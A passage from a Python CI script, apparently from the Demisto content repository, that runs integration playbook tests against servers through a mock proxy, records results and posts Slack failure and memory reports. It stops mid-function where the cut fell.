source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_content.py | from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
from datetime import datetime
from distutils.version import LooseVersion
import urllib3
import requests
import demisto_client.demisto_api
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
'tests on(Valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.now()}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n'\
'\t Investigate the playbook and the integrations.\n'\
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(server, demisto_api_key):
"""
Turn off telemetry on the AMI instance
:param server: demisto server to connect to
:param demisto_api_key: api key to use for connection
:return: None
"""
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_api_key, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, chanel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=chanel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(tests_settings, c, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
prints_manager, thread_index=0, is_mock_run=False):
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
return succeed
# run the test using a real instance, record traffic.
def run_and_record(tests_settings, c, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(tests_settings, c, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(tests_settings, c, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name, start_message,
prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
succeed = run_and_record(tests_settings, c, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, api_key=demisto_api_key, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(tests_settings, client, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(tests_settings, client, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
test_message, test_options, slack, circle_ci, build_number, server_url, build_name, start_message,
prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, thread_index=0):
for integration in integrations:
integration_params = [item for item in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests, is_filter_configured,
filtered_tests, skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server, build_name, prints_manager, is_ami, thread_index=thread_index)
def get_and_print_server_numeric_version(tests_settings):
if tests_settings.is_local_run or not os.path.isfile('./Tests/images_data.txt'):
# TODO: verify this logic, it's a workaround because the test_image file does not exist on local run
return '99.99.98' # latest
with open('./Tests/images_data.txt', 'r') as image_data_file:
image_data = [line for line in image_data_file if line.startswith(tests_settings.serverVersion)]
if len(image_data) != 1:
print('Did not get one image data for server version, got {}'.format(image_data))
return '99.99.98' # latest
server_numeric_version = re.findall(r'Demisto-Circle-CI-Content-[\w-]+-([\d.]+)-[\d]{5}', image_data[0])
if server_numeric_version:
server_numeric_version = server_numeric_version[0]
else:
server_numeric_version = '99.99.98' # latest
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print('Server image info: {}'.format(image_data[0]))
print('Server version: {}'.format(server_numeric_version))
return server_numeric_version
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
# turn off telemetry
turn_off_telemetry(server, demisto_api_key)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(demisto_api_key, server, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(demisto_api_key, server, proxy.ami.docker_ip + ':' + proxy.PROXY_PORT)
for t in mockable_tests:
run_test_scenario(tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_api_key, prints_manager,
thread_index=thread_index)
proxy.configure_proxy_in_demisto(demisto_api_key, server, '')
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_api_key, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
for t in unmockable_tests:
run_test_scenario(tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests,
is_filter_configured, filtered_tests, skipped_tests, secret_params, failed_playbooks,
playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_api_key,
prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
prints_manager.add_print_job(f'~~ Thread {thread_index}failed ~~\n{str(exc)}\n{traceback.format_exc()}',
print_error, thread_index)
failed_playbooks.append(f'~~ Thread {thread_index} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'.\
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be ran
"""
tests_settings.serverNumericVersion = get_and_print_server_numeric_version(tests_settings)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
